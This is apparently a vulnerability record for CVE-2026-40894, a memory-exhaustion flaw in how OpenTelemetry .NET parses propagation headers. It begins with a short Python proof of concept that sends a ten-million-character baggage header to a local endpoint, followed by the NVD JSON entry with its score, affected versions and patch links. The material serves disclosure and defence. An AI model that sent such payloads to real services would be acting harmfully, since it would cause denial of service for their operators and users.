CVE-2026-40894

import requests # Target URL (Replace with actual vulnerable endpoint) target_url = "http://localhost:5000/api/trace" # Generate a malicious payload to trigger excessive memory allocation. # This targets the baggage parsing logic mentioned in the advisory. # Creating a very long key-value pair can exhaust memory during parsing. malicious_payload = "key=" + "A" * 10000000 # 10 million characters headers = { "baggage": malicious_payload, "User-Agent": "CVE-2026-40894-POC" } try: print(f"Sending payload to {target_url}...") response = requests.get(target_url, headers=headers, timeout=10) print(f"Request completed. Status Code: {response.status_code}") except requests.exceptions.Timeout: print("Request timed out. Potential DoS condition triggered.") except Exception as e: print(f"An error occurred: {e}")

{"cve": {"id": "CVE-2026-40894", "sourceIdentifier": "[email protected]", "published": "2026-04-23T19:17:28.810", "lastModified": "2026-04-28T19:34:26.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenTelemetry dotnet is a dotnet telemetry framework. In OpenTelemetry.Api 0.5.0-beta.2 to 1.15.2 and OpenTelemetry.Extensions.Propagators 1.3.1 to 1.15.2, The implementation details of the baggage, B3 and Jaeger processing code in the OpenTelemetry.Api and OpenTelemetry.Extensions.Propagators NuGet packages can allocate excessive memory when parsing which could create a potential denial of service (DoS) in the consuming application. This vulnerability is fixed in 1.15.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opentelemetry:opentelemetry:*:*:*:*:*:.net:*:*", "versionStartIncluding": "0.5.0", "versionEndExcluding": "1.15.3", "matchCriteriaId": "7CF8EB09-F7C5-49FA-BE45-15C9D6ACAE68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opentelemetry:opentelemetry.api:*:*:*:*:*:.net:*:*", "versionStartIncluding": "0.5.0", "versionEndExcluding": "1.15.3", "matchCriteriaId": "F4494846-0F47-4868-8315-76F82BA431CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opentelemetry:opentelemetry.extensions.propagators:*:*:*:*:*:*:*:*", "versionStartExcluding": "1.3.0", "versionEndExcluding": "1.15.3", "matchCriteriaId": "FD34268F-5D62-4ACF-9E83-22DA39B5B7F3"}]}]}], "references": [{"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/1048", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/3244", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/3309", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/533", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/7061", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-g94r-2vxg-569j", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}